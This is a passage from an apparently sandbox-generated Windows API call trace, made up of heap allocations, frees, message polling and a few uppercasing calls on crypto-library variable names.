0x2e54ce8 [0205.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0205.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0205.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0205.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cb8 [0205.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0205.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0205.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0205.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b88 [0205.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0205.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0205.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0205.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0205.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0205.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0205.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0205.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0205.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0205.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb000) returned 0x2f3a028 [0205.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0205.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0205.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0205.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0205.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0205.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0205.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0205.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0205.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0205.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0205.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0205.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0205.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0205.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0205.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0205.800] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0205.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0205.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0205.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0205.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0205.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0205.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0205.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0205.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0205.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0205.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0205.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0205.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0205.801] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0205.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0205.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0205.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0205.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0205.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0205.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0205.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0205.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0205.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0205.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0205.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0205.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0205.801] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0205.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0205.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0205.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0205.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0205.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0205.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0205.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0205.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0205.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0205.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0205.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0205.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0205.802] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0205.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0205.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0205.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0205.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0205.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0205.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0205.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0205.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0205.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0205.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0205.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0205.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0205.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0205.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0205.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0205.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0205.803] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0205.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0205.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0205.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0205.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0205.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0205.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0205.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0205.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0205.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0205.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0205.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0205.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0205.803] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0205.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0205.803] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0205.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0205.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0205.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0205.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0205.804] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0205.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0205.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff48 [0205.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0205.804] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0205.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff48 | out: hHeap=0x970000) returned 1 [0205.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0205.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0205.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0205.804] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0205.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0205.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0205.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0205.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0205.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0205.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0205.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0205.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0205.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0205.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0205.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0205.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0205.805] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0205.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0205.805] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0205.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc00 [0205.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0205.805] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0205.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc00 | out: hHeap=0x970000) returned 1 [0205.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0205.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0205.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0205.805] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0205.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0205.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0205.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0205.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0205.806] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0205.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0205.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0205.806] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0205.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0205.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0205.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0205.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0205.806] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0205.806] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0205.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0205.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0205.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0205.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0205.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0205.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0205.806] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0205.806] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0205.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0205.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0205.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0205.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fea0 [0205.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0205.807] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0205.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fea0 | out: hHeap=0x970000) returned 1 [0205.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0205.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0205.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0205.807] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0205.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0205.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0205.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0205.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0205.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0205.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0205.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0205.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0205.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0205.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0205.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0205.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0205.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0205.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0205.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0205.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0205.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0205.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0205.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0205.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0205.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0205.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0205.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0205.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0205.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0205.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0205.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0205.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0205.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0205.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0205.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0205.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0205.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0205.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0205.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0205.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0205.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0205.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0205.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0205.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0205.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0205.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0205.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0205.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0205.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0205.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0205.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0205.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0205.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0205.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0205.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0205.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0205.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0205.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0205.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0205.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0205.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0205.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0205.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 